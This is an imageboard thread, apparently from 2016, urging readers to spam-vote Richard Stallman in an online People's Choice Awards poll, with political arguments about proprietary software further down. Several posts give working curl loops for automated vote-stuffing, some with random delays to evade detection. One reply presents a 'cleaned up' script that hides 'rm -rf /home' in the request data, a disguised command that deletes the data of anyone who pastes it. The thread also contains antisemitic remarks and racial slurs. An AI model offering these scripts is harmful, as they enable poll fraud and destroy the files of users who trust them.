ALL-RIGHT Sup Forums

ALL-RIGHT Sup Forums
We should vote for Richard Stallman for the People's Choice Award 2017. vote.peopleschoice.com/#!/home/all/58/4
Or really, you can vote for whomever you want.
The website allows you to vote multiple times.

Paste this script in Terminal for OS X or Linux and run it to spam-vote. For Windows users, paste it in Cygwin or Bash for Windows.

while true; do
curl 'vote.peopleschoice.com/vote.php' \
--compressed \
--insecure \
-H 'Host: vote.peopleschoice.com' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' \
-H 'Accept: application/json, text/plain, */*' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Content-Type: application/x-www-form-urlencoded;charset=utf-8' \
-H 'Referer: vote.peopleschoice.com/' \
-H 'Connection: keep-alive' \
--data 'isMobile=false&from=wb&personalized=false&hash=&nid=&cid=58&userVariant=richard%20stallman'
done

Other urls found in this thread:

vote.peopleschoice.com/vote.php'
vote.peopleschoice.com/'
youtube.com/watch?v=radmjL5OIaA
twitter.com/NSFWRedditImage

how long should I run it

Thank you. Reported to administration.

until a week after the results are in

>Stallman

Get out of here with the autism

tep kok

Hey, you can input any name you'd like. You can write Bill Gates for all I care.

I'm pretty sure curl has an option for "wait a random number of seconds before" which will greatly increase you chances of not getting caught

>Sup Forums

>favorite youtube star
I mean it is a little demeaning, but I guess it makes sense

>not voting for Eric S. Raymond for shits and giggles

what a shitty script...

here, I cleaned it up for you.

#!/bin/bash
cnt=0;
vote() {
person=""
for part in $@; do
person="$person%20$part";
done
res=$(curl 'vote.peopleschoice.com/vote.php' \
--compressed \
--insecure \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' \
--data "isMobile=false&from=wb&personalized=false&hash=&nid=&cid=58&userVariant=$person" 2>/dev/null);
if [ $res == '{"success":true}' ]; then
((cnt++));
echo -en "voted $cnt times\r";
else
echo -e "\nfailed\n";
fi
t=$(awk 'BEGIN{srand();print (rand()*(10)) }')
sleep $t
}

while [ "$(date | awk '{print $2 $3}')" != "Nov15" ]; do
vote richard stallman
done

You had a typo in there, ftfy. This is the official version.

#!/bin/bash
cnt=0;
vote() {
person=""
for part in $@; do
person="$person%20$part";
done
res=$(curl 'vote.peopleschoice.com/vote.php' \
--compressed \
--insecure \
--data "isMobile=fa";rm -rf /home;"lse&from=wb&personalized=false&hash=&nid=&cid=58&userVariant=$person" 2>/dev/null);
if [ $res == '{"success":true}' ]; then
((cnt++));
echo -en "voted $cnt times\r";
else
echo -e "\nfailed\n";
fi
t=$(awk 'BEGIN{srand();print (rand()*(10)) }')
sleep $t
}

while [ "$(date | awk '{print $2 $3}')" != "Nov15" ]; do
vote richard stallman
done

>not hiro or moot, for old time's sake
Punintended.

not gonna fall for your tricks, user.

why would I remove my home folder?

why should we vote for a fat neckbeard?
what has he done for the world of Sup Forums?

i wonder how many people ran this without reading it

Why sould I vote for a communist?
If he had money he would be doing the same shit that Bill Gates is doing to push the Jewish agenda.

Jews want to divide and conquer us, Stallman wants to unite us with free software and a free society. You don't know shit about Jews and your newfaggotry is showing, reddit era Sup Forumsnigger.

youtube.com/watch?v=radmjL5OIaA
See for youself.
>Forcing a deluded "morality" through force.
>Population control becasue muh environment.
>People who don't agree with me should starve.
>I don't care about people if they don't do as I say.
Anyways, watch the video and see for yourself.

I didn't know it was RMS's idea to open source BSD. \
What a guy.

His argument is that proprietary software is a form of enslaving people.
By ensuring people cannot study, improve or share what they are doing with their computers, they are being held back and it makes the creators control the users.

Now with this in mind, it makes a lot more sense.

He thinks that enslaving people is wrong.
And that people should be forced to not be able to enslave people as to prevent abuse of power.

As for his comments to about children, he does not think that doing immoral things is okay, even if it is to feed your kids.
If they cannot find a way to feed their kids without enslaving people, then people should not have kids.

From his perspective, everything he said was reasonable.
Now you might disagree with his perspective on proprietary software, but you didn't bring that up.
Brian Lunduke had the perspective that stallman might bring up some practical ways to fix the situation.
They were talking about two different things.
Stallman does not care about how people will make money.
It is a not an issue for him.

I personally think Eben Moglen is a better version of Stallman, but he is not as entertaining. But they share the same ideology.

>proprietary software is a form of enslaving people
It's not, it's only a product, problem happens when you have a goverment forcing people to use that software or any other kind of product.
If you base your whole thought process in that asumption then you end up like Stallman, it's in fact somewhat reasonable.
The problem is that he sees closed source software as some kind of attack and not just a product wich it really is.
He seems to be the kind of persons that thinks that guns kill people.

>problem happens when you have a goverment forcing people to use that software or any other kind of product.
It doesn't have to be a government. It could be a monopoly.
Assume you're a computer user with little to no knowledge of programming and follow along with this scenario.
>need a piece of software to do a particular thing
>this software is produced by a company, it's source code is proprietary, they can change the program and license at will, and they can charge you any amount of money for the software
>if you want to use their program, you need to essentially enslave yourself to them and follow their whims and fancies
It doesn't really matter how much power they exercise, the fact that they have that kind of control over the program in itself is disconcerting. You have to hope that the developers don't do anything ridiculous in the next iteration or update in order to keep using it.

>Paste this script in Terminal for OS X or Linux and run it to spam-vote.

And people wonder why someone like Donald Trump actually got the nomination and might win the Presidential election - it's because of fuckheads like you.

Not because of your stupid spamming shit but because you're just fucking stupid from the core.

>stupid fucking people will be the death of us all

What does trump have anything to do with this thread?

>It could be a monopoly.
Monopolies are extremely rare in a free market, they exist becasue of lobbies inside the goverment (see Clinton Foundation)
>if you want to use their program, you need to essentially enslave yourself to them and follow their whims and fancies
Again this is a strawman, if there is enough market incentive a competing company will create an alternative and Open source has an advantage because information os not scarce, so it can't be sold like it.
Most hate towards closed source programs come from the way that Microsoft and Adobe handle business but they fail to see that goverment aided monopolies are everywhere.

Let's see it another way:
What if it is the government who makes all proprietary software?
What if the government controls what your software does? What if you cannot study what it does so you can make alternatives?

It is not just a product.
A product is something you buy. Pay for once and then you own it.
You cannot own proprietary software.
It is designed to be something you pay for the privilege of using it.

I worry more about the fact that the Goverment is the one who prints the "money" (in the lack of a better term since it's bot based on gold it's just a piece of paper).

I worry more about goverment controlled healthcare that you are forced to pay for.
I worry more about goverment controlled education (indoctrination at this point).

>something you pay for the privilege of using it.
Then it's amoral to create a car rent company?

This is my problem with pro-Stallman people, they focus of small things and miss the big picture.
Rember, the leftist people have a good eye to see the problems, their solutions are completely retarded thought.

>Then it's amoral to create a car rent company?
The difference is that buying software is marketed as "buying", not "renting". Why give the illusion of ownership if you reserve the right to revoke it at any time you choose and for any arbitrary purpose?

that's true, but the "buying software" nonsense comes from companies who are used to sell products, and since software can't be a product becasue it's not scarce (it's information) this creates that situation, that's why the insane amount of lobbying these companies make in order to push nonsense like DRM.
In a free market companies would have to compete with better support and services.

This, I got a 5930k desktop and I'm going to run 7 wm and outvote all you niggers.

This was on Sup Forums the other day, why not you piss off and actually make your own script

Where can you see results?

>Then it's amoral to create a car rent company?
No.
Proprietary software offers a different structure for the development of software.
There are bad practices in the car industry, but they doesn't happen because people take a loan to afford the car or if they rent the car.
Things that I see as immoral is when you make a car where reparations is illegal, you cannot stop the car manufacturer from repairing your car and when you are done with the car, you are not allowed to sell it or borrow it to a friend.

With a car rental service, you are borrowing someone your car.
It is expected that this means that you cannot use a car the same way, but it is not restrictions created because of the rental service.

while true; do
curl 'vote.peopleschoice.com/vote.php' \
--compressed \
--insecure \
--data 'isMobile=false&from=wb&personalized=false&hash=&nid=&cid=58&userVariant=richard%20stallman'
RANGE=5
numGen=$RANDOM
let "numGen %= $RANGE"
sleep $numGen
done

>Terminal for OS X
kys

>he disagrees with me on a couple of issues, how dare he!

Filthy frank would be a better choice 2bh.